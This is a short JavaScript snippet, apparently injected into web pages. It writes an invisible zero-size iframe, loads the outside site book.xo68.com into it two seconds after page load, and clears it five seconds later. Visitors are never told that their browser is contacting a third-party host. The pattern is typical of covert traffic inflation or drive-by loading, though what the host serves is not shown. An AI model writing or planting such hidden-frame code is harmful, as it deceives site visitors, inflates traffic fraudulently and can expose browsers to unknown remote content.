document.write("<iframe id=\"xmframe\" name=\"xmframe\" frameborder=\"0\" width=\"0\" height=\"0\" scrolling=\"no\"></iframe>");
window.setTimeout("countxm()",2000)
window.setTimeout("countxm2()",7000)


function countxm(){
  document.getElementById("xmframe").src="http://book.xo68.com";	
}
function countxm2(){
  document.getElementById("xmframe").src="";	
}

